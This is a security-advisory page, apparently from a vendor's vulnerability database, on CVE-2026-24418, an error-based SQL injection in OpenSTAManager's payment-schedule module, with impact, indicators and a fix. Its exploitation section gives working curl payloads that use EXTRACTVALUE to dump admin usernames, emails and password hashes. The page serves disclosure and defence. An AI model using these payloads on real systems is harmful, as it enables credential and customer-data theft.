CVE-2026-24418: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-24418 is an error-based SQL injection vulnerability in the Scadenzario (Payment Schedule) bulk operations module of OpenSTAManager, an open-source ERP and field service management application. It affects OpenSTAManager versions 2.9.8 and earlier, allowing authenticated attackers to extract complete database contents — including user credentials, customer PII, and financial records — via XPATH error messages. The vulnerability was discovered by Łukasz Rybak, published on February 6, 2026, and carries a CVSS v4.0 base score of 8.7 (High) and a CVSS v3.1 base score of 6.5 (Medium) (GitHub Advisory, OSM Advisory).

Technical details

The root cause is improper neutralization of SQL special elements (CWE-89) in /modules/scadenzario/bulk.php at line 88. User-supplied POST data (id_records[]) is processed by array_clean() in /lib/util.php, which only removes empty values and does not enforce integer type validation. The sanitized array is then passed directly to implode(',', $id_records) and concatenated into a raw SQL IN() clause without parameterization, enabling injection of arbitrary SQL. An attacker exploits this by submitting a crafted id_records[] element containing an EXTRACTVALUE()-based payload (e.g., id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT ...)))#) to leak data through MySQL XPATH error messages (OSM Advisory, GitHub Advisory).

Impact

Successful exploitation allows authenticated attackers to extract the entire database contents, including admin usernames, email addresses, bcrypt password hashes, customer personally identifiable information, and financial/payment schedule records. Because the injection occurs in a financial module, sensitive business data such as payment schedules and invoice references are directly at risk. Depending on database permissions, attackers may also be able to modify or delete records, and extracted credentials could enable further account takeover or lateral movement within the application (OSM Advisory, GitHub Advisory).

Exploitability

A public proof-of-concept (PoC) exploit with step-by-step curl commands is included in the GitHub Security Advisory and has been confirmed and tested on a live OpenSTAManager v2.9.8 instance. The EPSS score is approximately 0.015% (3rd percentile), and there is no evidence of active in-the-wild exploitation at this time. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires low-privilege authenticated access to the Scadenzario module (GitHub Advisory, OSM Advisory).

Exploitation steps

  1. Authenticate: Log in to the OpenSTAManager instance with any account that has access to the Scadenzario module:
curl -c cookies.txt -X POST 'http://TARGET/index.php?op=login' -d 'username=USER&password=PASS'
  1. Identify the vulnerable endpoint: The injection point is POST /actions.php?id_module=18 with the op=send_reminder operation and the id_records[] POST parameter.
  2. Probe for error-based injection: Send a crafted payload using EXTRACTVALUE() to trigger an XPATH error that leaks data:
curl -b cookies.txt -d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(USER(),' | ',VERSION()))))%23" "http://TARGET/actions.php?id_module=18"

Expected response: XPATH syntax error: '~osm@localhost | 8.0.40-...' 4. Extract admin credentials: Modify the subquery to target the zz_users table:

curl -b cookies.txt -d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,':',email) FROM zz_users LIMIT 1)))%23" "http://TARGET/actions.php?id_module=18"
  1. Extract password hashes in chunks (EXTRACTVALUE is limited to ~31 chars per call): Use SUBSTRING(password,1,31) and SUBSTRING(password,32,60) in successive requests to reconstruct the full bcrypt hash.
  2. Enumerate additional data: Adapt the subquery to extract customer PII, financial records, or other sensitive tables from the database schema (OSM Advisory, GitHub Advisory).

Indicators of compromise

  • Network: Unusual POST requests to /actions.php?id_module=18 with op=send_reminder containing id_records[] values that include SQL keywords such as EXTRACTVALUE, CONCAT, SELECT, SUBSTRING, or hex-encoded strings (e.g., 0x7e).
  • Logs: Web server access logs showing repeated POST requests to /actions.php?id_module=18 with URL-encoded SQL payloads (%23, %27, EXTRACTVALUE) in the request body; application error logs containing XPATH syntax error messages with data prefixed by ~.
  • Database: MySQL general query log entries showing EXTRACTVALUE() or CONCAT() functions used within WHERE id IN (...) clauses on the co_scadenziario table; unexpected queries against zz_users or other sensitive tables originating from the web application user.
  • Application: Error responses returned to the client containing XPATH syntax error: followed by database content such as usernames, emails, or version strings (OSM Advisory).

Mitigation and workarounds

No patched version has been officially released as of the advisory publication date — the advisory lists "None" for patched versions. The recommended fix is to apply type validation in /modules/scadenzario/bulk.php before the SQL query: add $id_records = array_map('intval', $id_records); followed by $id_records = array_filter($id_records, fn($id) => $id > 0); to ensure only positive integers are used in the IN() clause. As interim mitigations, restrict access to the Scadenzario module to only trusted users, deploy WAF rules to detect and block SQL injection patterns targeting /actions.php?id_module=18, and monitor database query logs for suspicious EXTRACTVALUE or CONCAT usage (GitHub Advisory, OSM Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management